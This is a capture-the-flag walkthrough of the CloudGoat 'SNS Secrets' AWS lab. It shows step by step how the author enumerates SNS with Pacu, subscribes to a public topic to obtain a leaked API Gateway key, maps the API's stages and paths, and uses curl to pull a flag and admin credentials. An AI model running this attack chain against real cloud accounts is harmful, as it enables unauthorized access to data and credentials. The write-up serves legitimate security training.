Cloudgoat-SNS-Secrets

AWS SNS Privilege Escalation Walkthrough

Initial Access

We begin with the following AWS credentials:

sns_user_access_key_id = [REDACTED]
sns_user_secret_access_key = [REDACTED]

Let’s verify who we are by running the get-caller-identity command:

aws sts get-caller-identity --profile init                                              
{
    "UserId": "AIDAQ6VKGD5Y4HR5QXYBV",
    "Account": "065855168369",
    "Arn": "arn:aws:iam::065855168369:user/cg-sns-user-cgidi78fhfoxxa"
}

SNS Enumeration

Based on the IAM username, we can infer that this account likely has access to SNS services. Let’s use Pacu to enumerate SNS resources:

Pacu (init:imported-init) > run sns_enum
Module not found. Is it spelled correctly? Try using the module search function.
Pacu (init:imported-init) > run sns__enum

We discovered one SNS topic. Let’s retrieve the specific details for this topic:

data SNS

SNS: {
    "sns": {
        "us-east-1": {
            "arn:aws:sns:us-east-1:065855168369:public-topic-cgidi78fhfoxxa": {
                "Owner": "065855168369",
                "SubscriptionsConfirmed": "0",
                "SubscriptionsPending": "0"
            }
        }
    }
}

Exploiting SNS Topic Access

If our IAM user has the sns:GetTopicAttributes permission for the target SNS topic, we can subscribe to it to gain more information. Let’s run:

run sns__subscribe --topics arn:aws:sns:us-east-1:065855168369:public-topic-cgidi78fhfoxxa --email yourMAIL@gmail.com

This will trigger a subscription confirmation email:



Approximately one minute after confirming the subscription, we receive an email containing an API Gateway key:

API Gateway Enumeration

First, let’s identify the API Gateway that will accept our newly acquired API key:

aws apigateway get-rest-apis --profile init --region us-east-1
{
    "items": [
        {
            "id": "8iisigub4b",
            "name": "cg-api-cgidi78fhfoxxa",
            "description": "API for demonstrating leaked API key scenario",
            "createdDate": "2025-05-14T12:38:25+03:00",
            "apiKeySource": "HEADER",
            "endpointConfiguration": {
                "types": [
                    "EDGE"
                ],
                "ipAddressType": "ipv4"
            },
            "tags": {
                "Scenario": "iam_privesc_by_key_rotation",
                "Stack": "CloudGoat"
            },
            "disableExecuteApiEndpoint": false,
            "rootResourceId": "9ehi5vsa3m"
        }
    ]
}

Finding the Stage Name

We need to identify the deployed stages:

aws apigateway get-stages --rest-api-id 8iisigub4b --profile init --region us-east-1
{
    "item": [
        {
            "deploymentId": "62jn11",
            "stageName": "prod-cgidi78fhfoxxa",
            "cacheClusterEnabled": false,
            "cacheClusterStatus": "NOT_AVAILABLE",
            "methodSettings": {},
            "variables": {},
            "tracingEnabled": false,
            "createdDate": "2025-05-14T12:38:27+03:00",
            "lastUpdatedDate": "2025-05-14T12:38:27+03:00"
        }
    ]
}

Identifying Available Resource Paths

Let’s enumerate the available API endpoints:

aws apigateway get-resources --rest-api-id 8iisigub4b --profile init --region us-east-1
{
    "items": [
        {
            "id": "9ehi5vsa3m",
            "path": "/"
        },
        {
            "id": "jl35fp",
            "parentId": "9ehi5vsa3m",
            "pathPart": "user-data",
            "path": "/user-data",
            "resourceMethods": {
                "GET": {}
            }
        }
    ]
}

Accessing Sensitive Data

Now we can construct our request using the API key to access the /user-data endpoint:

curl -X GET \
  -H "x-api-key: [REDACTED]" \
  https://8iisigub4b.execute-api.us-east-1.amazonaws.com/prod-cgidi78fhfoxxa/user-data

Success! We retrieved the flag and administrative credentials:

{"final_flag":"FLAG{SNS_S3cr3ts_ar3_FUN}","message":"Access granted","user_data":{"email":"[REDACTED]","password":"[REDACTED]","user_id":"1337","username":"SuperAdmin"}}